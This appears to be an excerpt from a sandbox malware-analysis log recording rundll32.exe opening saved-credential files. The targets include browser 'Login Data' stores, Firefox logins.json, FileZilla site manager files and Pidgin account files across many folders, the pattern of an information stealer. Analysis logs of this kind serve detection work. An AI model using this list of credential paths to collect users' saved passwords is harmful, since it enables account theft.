Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\oobe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SysWOW64\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files (x86)\rpoxldIfutSmyWjJrKGUzQXqIbavYDpyIXciZSXTNiYVRuumgNVVmwgBnyWNY\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\00c07260dc\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml